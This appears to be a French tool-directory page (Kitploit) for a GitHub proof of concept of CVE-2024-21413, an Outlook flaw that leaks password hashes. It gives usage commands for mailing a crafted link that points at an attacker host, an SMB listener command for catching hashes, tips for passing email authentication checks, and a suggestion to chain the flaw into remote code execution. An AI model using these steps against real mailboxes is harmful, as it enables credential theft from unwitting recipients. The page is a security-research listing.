Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/r00tb1t/cve-2024-21413-poc
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationCollecte d'InformationsApprentissage et ÉducationSécurité des Emails
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Vulnérabilité de divulgation d'informations de Microsoft Outlook (fuite du hash de mot de passe) - CVE-2024-21413 POC

Voir le dépôt
1723il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21413 - POC

Utilisation :

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : est le fichier de test partagé (document Word dans ce cas) depuis la machine de l'attaquant (xx.xx.xx.xx).

Pour garantir la conformité avec SPF, DKIM et DMARC, utilisez $IP et un domaine légitimes.

Assurez-vous d'installer la bibliothèque pexpect si ce n'est pas déjà fait avec pip install pexpect.

Conseils pour exécuter la POC :

  • Exécutez un écouteur SMB impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • Exécutez la POC

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • Cliquez sur le lien dans le courriel reçu, et BOOM vous devriez récupérer le login et le hash dans l'écouteur.
  • Enchaînez cette CVE avec CVE-2023-21716 pour obtenir une RCE !!!
  • Kudooooos & détails sur CVE-2024-21413 .
  • Contournement/Correctif :

[!CAUTION] ⚠️ Avertissement : IMPORTANT : Ce script est fourni uniquement à des fins éducatives, de tests éthiques et d'utilisation légale. Ne l'utilisez pas sur un système ou un réseau sans autorisation explicite. L'accès non autorisé aux systèmes informatiques et aux réseaux est illégal, et les utilisateurs pris en train d'effectuer des activités non autorisées s'exposent à des poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script..

Télécharger l’outil